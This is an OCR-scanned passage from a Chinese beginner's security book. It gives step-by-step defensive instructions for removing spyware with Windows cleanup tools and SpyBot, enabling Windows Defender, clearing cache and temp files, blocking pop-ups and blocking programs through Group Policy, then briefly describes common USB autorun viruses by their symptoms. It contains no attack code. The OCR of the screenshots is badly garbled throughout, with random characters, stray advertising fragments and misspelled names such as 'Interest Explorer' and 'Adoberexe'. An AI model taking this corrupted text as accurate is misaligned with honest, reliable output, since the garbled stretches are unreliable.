使 用 《Windows 清理 助手 》 清 理 间 谍 
软件 的 操作 步骤 如 下 。 
[step 图 双击 下 载 的 《Windows ; 
执行 文件 ， 即 可 打开 《Windows ; 
工作 界面 ， 如 下 图 所 示 。 


清理 助手 》 可 
清理 助手 》 


第 9 章 “网络 流 氓 软件 与 间谍 软件 的 清 


windows 
狐 理 助 玫 3. EE 
J A 
Re i 
已 过 法 疫 告 EMS 20173 
A ps 
演 sam re 了 座 suv 交 车 大 全 
A we pp 水 上 游乐 设备 
汽 ssex et 夫 阳 能 路 条 俯 格 
不 锋 钢 迷 接 机 
ms 长 志 欧 肖 7 座 py 
有 rma 
rr 他 7T4.0)-380r128 [ 云 ) 用 户外 消 了 升级 坟 作 - | 


[Sep 图 单 去 “立即 扫描 ”按钮 ， 即 可 开始 扫 
描 计 算 机 中 的 间谍 软件 ， 并 在 下 方 显 示 扫 
描 进度 条 ， 如 下 图 所 示 。 


二 人 要 | 
windows 


涌 理 助手 3.。 如 ie 万 mm 
NDE ,nen 
S en Rt 
已 二 精光 mS 20173 
nes 
三 aama 本 入 7 库 suv 汽 车 大 全 ee 
杷 aota 已 取消 网 页 号 拓 
A rpm pe 水 上 汶 乐 设备 0@ 
网 emot 
号 sae es 太阳 能 路 灯 价格 a 4 
不 领 钢 类 接 机 
长 实 欧 尚 7 座 npy 
了 区 7 权 | 
| 
用 户 吕 消 了 开锅 埠 作 | 


人 给 出 相应 的 提示 信息 ， 

提示 用 户 发 现 未 知 的 风险 程序 ， 是 否 提交 
给 技术 人 员 进 行 分 析 , 这 里 单 击 “ 是 ”按钮 ， 
如 下 图 所 示 。 


®@ 发 现 未 知 的 风险 程序 是 否 提交 给 技术 人 员 进 行 分 析 ? 
此 费 作 棕 有 蔓 于 提高 助手 的 清理 能 力 ! 
提交 的 信息 不 会 泄漏 您 的 个 人 隐私 . 乱 可 以 在 设置 中 关闭 此 功能 . 


选择 " 星 “ 以 后 提交 时 将 不 再 提示 . 


| am 否 IN) 


[step 图 分 析 完 成 后 ， 返 回 到 《Windows 清理 
助手 》 工 作 界 面 ， 在 其 中 选择 需要 清理 的 
对 象 ， 如 下 图 所 示 。 
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es 黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


windows 


请 理 勋 手 3.4 
RN 0 下 三 


WE] 
有 
Er 


sm | | mt Sum ea 


.7.001 70000 运 ) 所 庆生 作 


[ss 图 单 去“ 执行 清理 ”按钮 ， 弹 出 一 个 信 
息 提示 对 话 框 ， 提 示 用 户 是 否 备份 相应 的 
文件 / 注册 表 信 息 ， 这 里 单 击 “ 是 ”按钮 ， 
如 下 图 所 示 。 


[step 较 备份 完成 后 ， 即 可 开始 清理 扫描 出 来 
的 间谍 软件 ， 并 显示 扫描 的 进度 ， 如 下 图 
所 示 。 


执行 清理 
PP 


step 罗 在 “常用 功能 ”选项 列表 中 选择 “ 诊 
断 报告 ” 选项 ， 进 入 “诊断 报告 ”工作 界面 ， 
如 下 图 所 示 。 


windows 
级 清理 助手 3.3 


3 


EP 


(SS msn 
| 
es 
各 mn 


人 pm 


ee 


人 suns 


RE 79 和 作 
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step 图 单 去 “请 点 击 此 处 ， 开 始 诊断 ”按钮 ， 


即 可 开始 诊断 系统 ， 并 在 下 方 显示 诊断 的 
进度 ， 如 下 图 所 示 。 


sz 


[step 图 选择 “故障 修复 ”选项 ， 进 入 故障 修 
复 界面 ， 在 其 中 选择 需要 修复 的 对 象 ， 如 
下 图 所 示 。 


= 
step 柄 单 去 “执行 修复 ”按钮 ， 弹 出 “故障 
修复 ”对 话 框 ， 提 示 用 户 修复 前 暂时 关闭 
正在 运行 的 监控 程序 ， 如 下 图 所 示 。 


Step 图 单 去 “是 ”按钮 ， 即 可 开始 修复 系统 ， 
修复 完成 后 ， 弹 出 “故障 修复 ”对 话 框 ， 
提示 用 户 修复 操作 执行 完成 ， 如 下 图 所 示 。 


EGG 图 选择 “痕迹 清理 ”选项 ， 在 打开 的 界 
面 中 选择 要 清理 的 文件 和 注册 表 项 ， 如 下 
图 所 示 。 


windows 
理子 3.， 


nd 


DER Ps 


[| 


1 eestes0)-1 0 20.47 ole (27 -soriae (ED 


单 击 “ 分 析 ” 按 钮 , 即 可 开始 分 析 痕 迹 ， 
并 在 右 侧 的 窗 格 中 显示 分 析 结 果 ， 如 下 图 
所 示 。 


windows 
乡 理 助手 3.、 


人 


Ess nen-um :ec era 
es 
pe 


0 el 47 07 0s-ias (ED 


step 贺 单 击 “清理 ”按钮 ， 即 可 清理 扫描 出 
来 的 痕迹 ， 如 下 图 所 示 。 
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全 和 


村 


[sep 图 选择 “文件 操作 ”选项 ， 进 入 “文件 
操作 ”界面 ， 通 过 单 击 “ 添 加 ”按钮 ， 可 
以 添加 相应 的 文件 ， 如 下 图 所 示 。 


windows 


锋 理 助手 了. EE 尾 峰 
BRO TE 
rm ma 太 好 [EE] 


PIH 


step 国 选择 “清理 相关 ”选项 ， 在 打开 的 界 
面 中 可 以 查看 清理 时 的 日 志 记 录 ， 如 下 图 
所 示 。 


TITTTTO [a) 


step 轿 单 去 “清空 ”按钮 ， 弹 出 “日 志 记录 ?” 
对 话 框 ， 提 示 用 户 是 否 确定 要 清除 所 有 的 
历史 纪录 ， 单 击 “ 是 ”按钮 ， 即 可 清空 所 


149 
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有 的 历史 纪录 ， 如 下 图 所 示 。 


© 您 靖 定 要 清除 所 有 的 历史 纪录 么 ? 


[Sep 图 选择 “高 级 功能 ”选项 ， 在 弹出 的 
列表 中 选择 “脚本 对 象 ”选项 ， 在 其 中 可 
以 启用 《Windows 清理 助手 》 的 脚本 对 象 
功能 ， 如 下 图 所 示 。 


windows 
鸡 清理 助手 3.3 


用 由 驼 
Bm 


| 
玉 


me 


| ern 


[see 图 选择 “更 多 工具 ”选项 ， 在 打开 的 界 
面 中 可 以 查看 《Windows 清理 助手 》 提 供 
的 更 多 系统 维护 工具 ， 如 下 图 所 示 。 
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绝招 7: 使 用 SpyBot-Search&Destroy 
清理 

SpyBot-Search&Destroy 是 一 款 专门 用 
来 清理 间谍 程序 的 工具 。 到 目前 为 止 ， 它 已 
经 可 以 检测 一 万 多 种 间谍 程序 (Spyware)， 
并 对 其 中 的 一 千 多 种 进行 免疫 处 理 。 这 个 
软件 是 完全 免费 的 ， 并 有 中 文 语 言 包 支持 ， 
可 以 在 Server 级 别 的 操作 系统 上 使 用 。 

下 面 介 绍 使 用 SpyBot-Search&Destroy 
软件 查 杀 间谍 软件 的 具体 操作 步骤 。 
[step 轩 安 装 Spybot-Search&Destroy 并 初始 
化 ， 即 可 打开 其 主 窗口 ， 如 下 图 所 示 。 


加 Spybct -Search a Destroy 
(Mio Mo Langmge Hob 


中 SpbetStp Spybot - Search & Doestroy 
{可 
Uy Solento tot roammine sou op rrp 
[eee] ieee 


Use hs bhon you notioe some rrobiers Ihal haye 
Censd hat a ee orore ol Prollers, ert you wart 
Chane 


Seachl Deaoy 


[ee 


ve ncotart: kisscommendedo updale the 
ee 


Tos 
te | De 


[sep 图 由 于 该 软件 支持 多 种 语言 ， 所 以 在 其 
主 窗口 中 选择 Languages 一 “简体 中 文 ” 命 
令 ， 即 可 将 程序 主 界面 切换 为 中 文 模式 ， 
如 下 图 所 示 。 


加 Spybot Seordh & Dectroy 
文件 月 本 M] 证 训 L 部 二 H] 


“ sa 
CE | ti 
二 和 


重地 提示 - 强 列 建议 每 周 部 重新 一 次 雪人 主页 胁 数据 容 ! 
ss ma 


[step 图 单 去 其 中 的 “检测 ”按钮 或 单 击 左 侧 
的 “检查 与 修复 ”按钮 ， 即 可 打开 “检测 
与 修复 ”窗口 ， 单 击 “ 检 测 与 修复 ”按钮 ， 
即 可 开始 检查 系统 存在 的 间谍 软件 ， 如 下 
图 所 示 。 


门 


? 
Ea 
p 
三 
Ea 
加 
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Spyoot -Search a Destray Er 
文件 @] 模式 如 二 言 CL 帮助 00 


检测 与 修复 
其 列 开 黄 性 各 神 有 委 基 目 


bY | 动 邓 


正在 本 搞 岂 谋 与 广告 福永 【125091/471572: Win32 hewnt ae 


[stepZ 在 软件 检查 完毕 后 ， 检 查 页 上 将 会 列 
出 在 系统 中 查 到 的 可 能 有 问题 的 软件 。 选 
取 某 个 检查 到 的 问题 ， 单 击 右 侧 的 分 栏 箭 
头 ， 即 可 查询 到 有 关 该 问题 软件 的 发 布 公 
司 、 软 件 功能 、 说 明和 危害 种 类 等 信息 ， 
如 下 图 所 示 。 


加 Spybet -Search 了 Dectroy PE 
文件 () 模式 WW) 语言 (L) 帮助 (X) 


口 检 与 他 上 (7 检测 与 修复 
区 列表 后 全 种 妥 项 已 


Dialeo 呈 便 虽 各 mo 二 而 由 


巡 出 吉 病 


[ss 
站 知 
蝇 器 Br ee 
Li Ete 
(SHT S60ng6AG3) 注册 表 害 值 
局 人 wwe EF 


月 户 已 软 齐 检 弄 > 

选中 需要 修复 的 问题 程序 ， 单 击 “ 修 

复 ” 按 钮 ， 即 可 打开 “将 要 删除 这 些 项 目 ， 

要 继续 吗 ? ”提示 对 话 框 ， 如 下 图 所 示 。 
确认 


和 @@ 将 要 删除 这 些 项 目 。 要 涟 续 号 ? 


EB 图 单 二 “是 ”按钮 ， 即 可 看 到 在 下 次 系 
统 启动 时 自动 运行 提示 对 话 框 , 如 下 图 所 示 。 
警告 


一 些 问题 无 法 立即 修复 , 这 可 能 是 由 于 与 问题 有 关 的 文 
件 正在 使 用 中 (已 被 读 入 内 存 )。 

这 些 问题 可 以 在 系统 重新 启动 时 被 修复 。 

要 Spybot-S&&D 在 下 次 系统 启动 时 合 动 运行 吗 ? 


CE ] sw 


[Step 加 单 去 “是 ”按钮 ， 即 可 将 选取 的 间谍 
程序 从 系统 中 清除 。 修 复 后 的 结果 如 下 图 
所 示 ， 其 中 以 W 标 识 已 经 成 功 修复 的 问题 ， 
以 国标 识 修复 不 成 功 的 问题 。 

四 spybot - 5earch Destroy 一 D x 


让 反日” 辆 量 w 二 可 日 色 而 四 


OR EREarRoaaana 


[sp 图 待 修复 完成 后 ， 即 可 看 到 “确认 ”对 
话 框 。 在 其 中 会 显示 成 功 修复 以 及 尚未 修 
复 问 题 的 数目 , 并 建议 重启 计算 机 。 单 击 “ 确 
定 ” 按 钮 ， 重 启 计算 机 修复 未 修复 的 问题 
即 可 。 

确认 


@: 个 有 归 半 代 入 whit 


[step 图 选择 “还 原 ” 选 项， 在 打开 的 界面 中 
选择 需要 还 原 的 项 目 ， 单 击 “ 还 原 ” 按 钮 ， 
如 下 图 所 示 。 


因 spybor -Search & Desroy 三 ,而 闲 


宅 还 原 
和 六壬 有 村 条 过 所 人 的 从 


XxX mo 


1 ue 他 山田 


ET Utrog) 


step 酉 弹出 “确认 ”信息 提示 框 ， 提 示 用 户 
是 否 要 撤销 先前 所 做 的 修改 ， 如 下 图 所 示 。 


ls 
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确认 
【3) 您 下 准备 后 消 Spybot-S&&LD 先前 所 做 的 修改 。 要 将 续 
吗 ? 


Step 加 单 击 “继续 ”按钮 ， 弹 出 SpyBot- 
S&D Updater 窗口 ， 在 其 中 选择 要 更 新 的 文 
件 信息 ， 如 下 图 所 示 。 


局 spytcesap Updater 3 


x 
| | 
Les 
号 四 四 Infs 3 Jiate 六 
[Es 单 二 “是 ”按钮 ， 即 可 将 修复 的 问题 i : 

还 原 到 原来 的 状态 , 还 原 完毕 后 弹出 “信息 ” a 
提示 框 ， 如 下 图 所 示 。 Ee 
Updated base ins detections 716 WB 201571. 
信息 Updsted base possibly urpopular softwsre d. 到 os 
还 原 后 ， 和 需要 重新 检测 才能 使 被 还 原 的 项 目 出 现在 结果 3 8 201770. 


列表 中 。 


700 Eh 201770. 
mg B20, v 


Or tne tine sd Wa 


[tp 图 选择 “免疫 ”选项 ， 进 入 “免疫 ” 设 
置 界面 ， 使 用 免疫 功能 能 使 用 户 的 系统 具 
有 抵御 间谍 软件 的 免疫 效果 ， 如 下 图 所 示 。 


| 加 spybot - Search & Dectroy - 0O x 
文件 罗 恒 式 00 出言 L) 而 用 00 


日 慷 测 与 谤 所 (5) P 免疫 
保 仿 对 过 他 月 青 想 罕 元 法 入 侣 
brie am sin ie 多 mp 


一 Appv passve protedion 
可 > 生地 


Estee 图 单 去 Download 按钮 ， 即 可 下 载 更 新 
文件 ， 并 在 下 方 显示 下 载 的 进度 ， 如 下 图 
所 示 。 

居 spybotSa&D Updater - 村 x 


Mease select the upcates 1b cownicad here. 可 


jan horse detections 3 节 “2017- 
detectiens T020170... v 


正在 下 载 Detection rdles: Malwart 


pak iaalzrc li 及 houlusl Yiuon Wan 
@ 县 © a 


单 击 “ 查 找 更 新 ”按钮 ， 
SpyBot-S&D Updater 窗口 ， 在 其 中 显示 了 
需要 更 新 的 项 目 ， 如 下 图 所 示 。 


弹出 


周 Spybot-S&D Updater 一 口 X 


Please select a downioad place to dowrioad the updates fom. [eS 
Updates may work faster if you choose a place near your ourrent | 
location, 


| are A 
| 国 12onder-Verlae #1 (Gernany) 

国 1amdl @ DE (Gernany) 

(ied @ mm (earepe) 

lnd! @ Ee (purope) 

| 戎 lund! @ 08 (Britain) 

贸 lundl @ cp2 (Britain) 

| 加 lwnd!l @ vs (sA) 

| 加 lundi @ vs2 (sh) 

By FileForm (Global) 

| 国 conpaterBild de #1 (Gernany) 

Safer-Networking #2 (France) 

国 safer-ietworking #3 (Europe) 

国 Safer-ietworkine #4 (Earope) 

硬 sster-ietrorking 45 (ML) a 


< 
辐 cmam 
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绝招 8: 使 用 《微软 反 间谍 专家 》 清 


Windows Defender 是 Windows 10 的 一 前 
项 功能 ， 主 要 用 于 帮助 用 户 抵御 间谍 软件 
和 其 他 潜在 的 有 害 软件 的 攻击 ， 但 在 系统 
默认 情况 下 ， 该 功能 是 不 开启 的 。 下 面 介 
绍 如 何 开 启 Windows Defender 功能 ， 具 体 
的 操作 步骤 如 下 。 


[ep 国 单 击 “ 开 始 ”按钮 ， 在 弹出 的 快捷 菜 
单 中 选择 “控制 面板 ”选项 ， 即 可 打开 如 
下 图 所 示 的 窗口 。 
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所 有 控 刘 可 株 顶 口 3 淮 护 x 
个 回 ，22 浊 本， 所 有 了 a se 
ZH NED EV IEM [sl 你 希望 运行 此 应 用 吗 ? 
调整 计算 机 9 论 EE ” ”你 应 当 只 运行 由 信任 的 发 布 者 提供 的 应 用 。 
发 行者 : Qihoo 360 Software (Beijing) Company Limited 
we 程序 : 360 安 全 中 心 
| i 守 eitiocker ssin 宇 Ci\program Files\360\360safe\safemon\360Tray.exe 
Flash Player (32 位 ) © Intemetm 
本 信 个 望 运行 
县 remoterpp nam 国 wdow Deeder 一 是 ,我 信任 这 个 发 布 者 ， 和 希望 运行 此 应 用 
】 
Ws Windows To Go me 一 否 ,我 希望 在 运行 此 应 用 前 验证 发 布 者 的 


团 gfniEmwindows7) 闻 和 Pim 能 


口 不 本 时 示 此 信息 . 取消 


单 击 Windows Defender 超 链接 ， 即 可 
打开 Windows Defender 窗口 ， 提 示 用 户 此 单 击 “ 是 ， 我 信任 这 个 发 布 者 ， 希 户 


应 用 已 经 关闭 ， 如 下 图 所 示 。 运行 此 应 用 ” 超 链接 ， 即 可 启用 Windows 
Wndowe Deforder Defender 服务 。 


@ amesexn, Temiraitan. 


Pe 
EE 9.4 实战 演练 


证 应 是 的 类 亚 - 


实战 演练 1 一 一 删除 上 网 缓存 文件 
| 用 户 可 以 通过 “Intemet 选项 ”对 话 框 入 
5 国 在 “控制 面板 ”窗口 中 单 二 “安全 性 “删除 平时 上 网 的 缓存 文件 ， 具 体 的 操作 步 


与 维护 ” 超 链接 , 打开 “安全 性 与 维护 ”窗口 ， 又 如 下 。 
如 下 图 所 示 。 step 回 右 去 “开始” 按钮 ， 在 弹出 的 快捷 菜 


[Fa 一 6 单 中 选择 “控制 面板 ”菜单 命令 ， 打 开 “ 控 
MO “一 “ 制 面板 ”窗口 , 单 击 “Intemet 选 项 ” 超 链接 ， 
snes i 中 如 下 图 所 示 。 
onsenenDi zanese 
ey WE x 
| mt 个 国 ， 基 制 。， 记 有 态 制 要 机 ， 7 
B seps Ex we x4) REE EV IRM Wy 
| rr mer nae rs 下 
调整 计算 机 的 设 尘 查看 方 忒 大寺 村 ~ 
Eee i 
mor er sreeronas i ee 
Tmt 
上 = i 的 eneba 旺 ( 国 Leos es 
| me Mach ne Ee Moviot ran a a 
| PIM) 2016) 到 a pp 和 
> 围 wndow Defender HB Windows ToGo 
step 园 单 击 “间谍 软件 和 垃圾 软件 防护 ”后 吗 wndows mx 二 PF =e 
面 的 “立即 启用 ”按钮 ， 弹 出 如 下 图 所 示 财 #8iEswndows 7 逆 RiBRn 


对 话 框 。 EE 
[Sep 图 弹出 “Intemet 属性 ”对 话 框 , 单 击 “ 浏 
览 历史 记录 ”下 的 “删除 ”按钮 , 如 下 图 所 示 。 


i 


step 国 弹出 “删除 浏览 历史 记录 ”对 话 框 ， 
选择 需要 删除 的 缓存 文件 类 型 , 单 击 “ 删 除 ” 
按钮 ， 如 下 图 所 示 。 


加 mle) 
BNA 

[Sb 
人 


pF) 
人 


WB) 


[tep 园 弹出 “删除 浏览 历史 记录 ”窗口 ， 系 
统 开始 自动 删除 上 网 的 缓存 文件 ， 如 下 图 
所 示 。 


Ce 


[sep 图 删除 完成 后 ， 返 回 到 “Internet 属性 ” 
对 话 框 。 单 击 “ 浏 览 历史 记录 ”下 的 “ 设 
置 ”按钮 ， 弹 出 “网 站 数据 设置 ”对 话 框 ， 

设置 缓存 的 大 小 和 保存 天 数 ， 单 击 “ 移 动 
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文件 夹 ”按钮 ， 可 以 转移 缓存 文件 的 位 置 ， 
单 击 “ 确 定 ” 按 钮 ， 完 成 设置 ， 如 下 图 所 示 。 
恰 要 存放 和 页 硬 的 和 新 并 二; 

Ormewem 


E1024MI)/D) EE 
险 字 50-250MB) sd 


Sm 


Csershdministrator Wpp Dets\Loca\ McroscfNWindows\ 
INetCache\ 


xf 夫 MI-。。|。 直 在 亲 (OI 下 在 文件 W 


[二 


实战 演练 2 一 一 删除 系统 临时 文件 


用 户 可 以 使 用 《360 安全 卫士 》 清 理 系 四 和 本 浊 
统 临 时 文件 ， 具 体 的 操作 步骤 如 下 。 
[Sep 加 打开 《360 安全 卫士 》， 在 其 主 界面 
中 单 击 “ 电 脑 清理 ”按钮 ， 进 入 计算 机 清 
理 界 面 ， 在 其 中 选择 需要 清理 的 项 目 类 别 ， 
如 下 图 所 示 。 


[Bee 国 单 去 “一 键 扫描 ”按钮 ， 系 统 开始 自 
动 扫描 系统 垃圾 文件 ， 并 显示 具体 扫描 文 
件 的 目录 ， 如 下 图 所 示 。 


[step 图 扫描 完成 后 ， 软 件 显示 垃圾 文件 的 个 
数 和 大 小 ， 单 击 “ 一 键 清理 ”按钮 ， 即 可 
清理 系统 中 的 临时 文件 以 及 系统 垃圾 ， 如 
下 图 所 示 。 


we segs mL Fog np 


9.5 小 试 身 手 


加 练习 1: 屏蔽 网 页 广告 弹出 窗口 


Interest Explorer 11 浏览 器 具有 屏蔽 网 
页 广告 弹 窗 的 功能 ， 使 用 该 功能 屏蔽 网 页 

广告 弹 窗 的 操作 步骤 如 下 。 

Esteep 回 在 IE 11 浏 览 器 的 工作 界面 中 选择 “ 工 

具 ” 一 “弹出 窗口 阻止 程序 ”一 “启用 弹 

出 窗口 阻止 程序 ”菜单 命令 ， 如 下 图 所 示 。 

ED au 


删除 浏览 历 只 记录 (D)… 
inprivate 出 中 四 
关闭 中 阵 怀 护 (K 

ActiveX 篇 远 (0 

修复 连接 问题 (C) 

理 条 打开 上 次 浏 谢 贡 图 (S| 
梅 站 点 添加 到 应 用 视图 A) 


查看 下 载 (N) 


Cr+Sif+pel | 
curlshifrP 


cad 
SmartScreen 算 迁 强 (D) 


管理 煤 体 许可 证 (M) 
管理 加 载 顶 (A) 


step 图 打开 “弹出 窗口 阻止 程序 ”对 话 框 ， 
提示 用 户 是 否 确实 要 启用 Interest Explorer 
弹出 窗口 阻止 程序 ， 如 下 图 所 示 。 


弹出 窗口 阻止 程序 


06 确实 要 局 用 Internet Explorer 弹出 瘟 口 朋 止 程序 或? 


Ew 
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[Bp 了 单 去 “是 ”按钮 ， 即 可 启用 该 功能 ， 
然后 选择 {工具 ”x 弹出 窗口 阻止 程序 ”x 弹 
出 窗口 阻止 程序 设置 "菜单 命令 ,如 下 图 所 示 。 


EE CE TRY . 
ze sus sew enw EE sce 
aa 


step 国 打开 “弹出 窗口 阻止 程序 设置 ”对 话 
框 ， 在 “要 允许 的 网 站 地 址 ”文本 框 中 输 
入 允许 的 网 站 地 址 ， 如 下 图 所 示 。 


eins x 
mm 
egDERCIERL FAUNA AP9 
四 SEE 
rns 
| Ey 
sper 
seer 
ocran 
reeren 
Ep 
ea 
xsnansrer 
ao 


[ep 图 单 去 “添加 ”按钮 ， 即 可 将 输入 的 网 
站 网 址 添加 到 “允许 的 站 点 ”列表 中 。 单 
击 “ 关 闭 ” 按 钮 ， 即 可 完成 弹出 窗口 阻止 
程序 的 设置 操作 ， 如 下 图 所 示 。 


Pr 3 


加 
CC 人 从 
鸭 axanse0. 
An 
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sg 练习 2: 阻止 流氓 软件 自动 运行 

当 使 用 计算 机 的 时 候 ， 有 可 能 会 遇 到 
流氓 软件 ， 如 果 不 想 程序 自动 运行 ， 这 时 
就 需要 用 户 阻止 程序 运行 ， 具 体 的 操作 步 
又 如 下 。 
[step 图 按 Windows+R 组 合 键 ， 打 开 “ 运 行 ” 
对 话 框 ， 在 “打开 ”文本 框 中 输入 gpedit. 
msc， 如 下 图 所 示 。 


加 运行 


| 珂 wind ee 为 打开 如 由 程序. 
文件 .文档 下 ntemat 资源 
| 


打开 


gpeditmse 
半 人 用 管理 反 限 创建 此 任务 


Es Ba 


step 贺 单 去 “确定 ”按钮 ， 打 开 “ 本 地 组 策 
略 编辑 器 ”窗口 ， 如 下 图 所 示 。 


可 二 it 第 机 名 器 
文件 由 损 fF(A)。 查看 VI 


RB. 


凤 (H) 


外 中 | 四 | 国 忆 | 日 四 


[step 图 依次 展开 “用 户 配 置 ” 一 “管理 模 
板 ” 一 “系统 ”文件 ， 双 击 “ 不 运行 指定 
的 Windows 应 用 程序 ”选项 ， 如 下 图 所 示 。 


本 地 组 征 格 坊 句 器 
文件 (明报 作 (A) 二 看 V) 者 助 H) 
各 中 | 由 | 辐 | 忆 | 日 男 | 了 


step 园 打开 “不 运行 指定 的 Windows 应 用 


汪汪 交口 ， 选 择 “ 已 启用 ”来 启用 策略 ， 
如 下 图 所 示 。 
要 不 二 FE 的 Window: 应 用 导 话 口 x 


TE Wndowm FARES | [性 


ON ER 
加 BER 
O 〇 ERDI 


Windows 2000 及 上 村 


Wn 
IE Windows 二 生生 蕴 恒 中指 9 本 所. 


| 划 归 司 抽 财 二 生 慨 本 ， 则 用 广元 二 到 生 已 坟 2H 外 并 和 应 风 各 序 吕 表 
二 


有 基 所 二 机 天 条 了 商 吾 ， 则 用户 可 以 行人 所 各 
ma me 
外 


二 :Windows 2000 本 更 新 于 下 有 3F Microsoht 应 站 但 记 要 
ES 


ne 
列 中 名 入 应 风 村 反 的 亲 
en pe or 


[CJ = 
[Gp 图 单 击 下 方 的 “显示 …” 按 钮 ,打开 “ 显 
we 窗口 ， 在 其 中 添加 不 允许 的 应 用 
程序 ， 如 下 图 所 示 。 


旺 才 内容 


时 ” ， 在 “显示 内 
(om. 


RA 


不 允许 的 应 用 程序 列表 


SpaceSniff. exe 


确定 (0) 


[step 鸭 单 击 “ 确 定 ” 按 钮 ， 即 可 把 想 要 阻止 
的 程序 名 添加 进去 。 此 时 ， 如 果 再 运行 此 
程序 ， 就 会 弹出 相应 的 应 用 提示 框 了 ， 如 
下 图 所 示 。 


取消 (C) 


@ 本 次 得 作 帕 于 这 台 计 算 机 的 限制 而 被 取消 。 请 与 你 的 系统 管理 员 腾 系 。 


第 10 章 ”可 移动 U 盘 的 安全 防护 
与 病毒 查 杀 


随 着 可 移动 硬盘 、U 盘 等 移动 存储 介质 使 用 越 来 越 广泛 ， 它 已 经 成 为 木马 病毒 等 传播 
的 主要 途径 之 一 。 本 章 介 绍 U 盘 的 安全 防护 与 病毒 的 查 杀 ， 主 要 内 容 包 括 U 盘 病毒 介绍 、 


U 盘 的 安全 防护 技巧 、U 盘 病毒 的 查 杀 等 。 


10.1 _U 盘 病毒 概述 


U 盘 病毒 又 称 为 autorun 病毒 ， 是 依托 
U 盘 、 移 动 硬盘 等 移动 存储 设备 ， 通 过 形 
态 为 autorun 名 称 的 隐藏 文件 进行 传播 的 ， 
扩展 名 通常 为 inf、exe 等 几 种 。U 盘 病 毒 
不 但 扰乱 了 计算 机 操作 系统 的 正常 使 用 ， 
非法 算 改 、 删 除 用 户 数据 资料 ， 而 且 可 能 
会 造成 大 规模 的 病毒 扩散 等 现象 。 


10.1.1 了 解 U 盘 病毒 


要 研究 U 盘 病毒 ， 首 先 要 了 解 它 的 原 


1. U 盘 病毒 的 原理 


U 盘 病毒 利用 了 autorun.inf 自动 运行 的 
原理 进行 传播 。 病 毒 首先 向 U 盘 写 入 病毒 
程序 ， 然 后 更 改 autorun.inf 文件 。Windows 
运行 被 更 改 的 autorun.inf 文件 就 会 激活 病 
毒 。 被 激活 的 U 盘 病 毒 还 会 自动 检测 新 插 
入 的 U 盘 ， 进 行 自身 的 复制 和 传播 。 


2 . U 盘 病毒 的 特点 


当 用 户 在 使 用 U 盘 等 移动 存储 设备 的 
过 程 中 ， 发 现 打开 盘 时 速度 极 慢 ， 双 击 
进入 时 总 是 显示 被 某 程序 占用 之 类 的 提示 ; 
或 在 U 盘 右键 菜单 中 出 现 “ 自 动 播放 ”、 
Anuto 等 选项 时 ， 则 表明 用 户 已 经 感染 UU 盘 
病毒 。 


U 盘 病 毒 发 作 时 具有 以 下 特性 。 

(1) 传播 速度 快 : 由 于 U 盘 病毒 能 
够 自动 执行 ， 在 用 户 计算 机 系统 没有 采取 
防护 措施 的 情况 下 ， 往 往 在 病毒 U 盘 插入 
USB 接口 的 一 瞬间 ， 即 已 感染 病毒 。 

(2) 隐蔽 性 高 : U 盘 病 毒 本 身 是 以 “ 隐 
藏 文件 ”的 形式 存在 的 ， 而 且 能 伪装 在 其 
他 正常 系统 文件 夹 和 文件 ， 隐 藏 在 文件 目 
录 中 ， 不 易 被 察觉 。 

(3) 传播 范围 广 : 随 着 U 盘 、 移 动 硬 
盘 等 移动 存储 设备 的 大 量 普 及 ， 就 会 造成 
大 规模 的 病毒 扩散 现象 。 


10.1.2 ”常见 U 盘 病毒 


利用 autorun.inf 自动 运行 的 原理 ，U 得 
病毒 的 数量 与 日 俱 增 ， 下 面 将 简单 介绍 几 
种 常见 的 U 盘 病毒 。 


1. Adober. exe 病 毒 


当 用 户 的 操作 系统 感染 Adoberexe 病 
毒 后 ， 双 击 U 盘 时 暂 无 反应 。 等 一 会 儿 就 
会 弹出 对 话 框 : “Adoberexe error， 请 查看 
Adoberexelog”， 并 且 癌 盘 根 目录 中 多 了 
一 个 Adoberexe 文件 ， 其 图 标 为 一 个 普通 
可 执行 程序 。 

当 右 击 U 盘 时 ， 在 快捷 菜单 最 上 面 出 
现 Auto 选项 。 同 时 ， 查 看 任务 管理 器 时 会 
发 现 进程 中 出 现 名 为 Adoberexe 的 进程 ， 
计算 机 运行 速度 缓慢 。 
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该 病毒 是 检测 到 有 盘 插 入 后 ， 自 动 
从 感染 主机 中 复制 Adoberexe 和 自动 启动 
文件 autorun inf, 使 得 U 盘 图 标 在 被 双击 后 ， 
执行 Adoberexe， 和 理 噬 系统 的 内 存 〈 每 次 双 
击 ， 进 程 中 都 会 多 一 个 Adoberexe) ， 并 修 
改 注 册 表 ， 在 系统 盘 中 自我 备份 ， 以 感染 
更 多 的 插 往 该 主机 上 的 品 盘 。 


2. sxs. exe 病 毒 


当 用 户 的 操作 系统 感染 sxs.exe 病毒 后 ， 
单 击 计算 机 上 各 个 磁盘 分 区 时 ， 均 无 反应 ， 
只 能 通过 右键 快捷 菜单 中 的 “打开 ”选项 
打开 ， 且 在 右键 菜单 里 新 增 了 “自动 播放 ” 
选项 。 每 个 磁盘 分 区 (除了 C 盘 ) 都 有 au- 
torun.inf 和 sxs.exe 两 个 文件 ， 删 除 之 后 会 
再 生 。 

U 盘 无 法 进行 “安全 删除 ”， 显 示 无 法 
停止 的 对 话 框 。 

某 些 杀毒 软件 实时 监控 自动 关闭 ， 并 
无 法 打开 。 

查看 任务 管理 器 时 ， 就 会 发 现 进程 中 
出 现 名 为 sxs.exe 或 svohost.exe 的 进程 。 


3. DOC. exe 病 毒 


当 用 户 把 染 有 该 病毒 的 品 盘 插入 后 ， 
操作 系统 中 即 被 写 入 win32.exe、win33.exe 
以 及 很 多 .exe 的 病毒 文件 ， 以 相似 图 标 冒 
充 MP3 和 DOC 格式 的 文档 。 该 病毒 一 旦 
发 作 ， 可 以 将 Office 用 户 的 Word 文档 逐个 
删除 ， 所 有 Windows 版 本 用 户 无 一 幸免 。 

查看 任务 管理 器 时 ， 就 会 发 现 进程 中 
出 现 名 为 doc.exe 的 进程 。 


4. RavMone. exe 病 毒 


RavMone.exe 企图 冒充 瑞星 杀毒 软件 的 
正常 文件 RavMon.exe 和 RavMond.exe。 当 
用 户 双击 口 盘 盘 符 ， 就 会 激活 autorun.inf 
自动 加 载 RavMone.exe。 

中 毒 之 后 ， 计 算 机 识别 U 盘 时 会 出 现 
一 些 问 题 ， 双 击 打 开 十 分 缓慢 ; 查看 所 有 文 
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件 ， 发 现 多 了 RavMone.exe、RavMonLog、 
msvcr71.dll 等 几 个 文件 。 同 时 U 盘 无 法 正 
常 退出 , 病毒 又 会 传染 给 新 的 口 盘 。 另 外 ， 
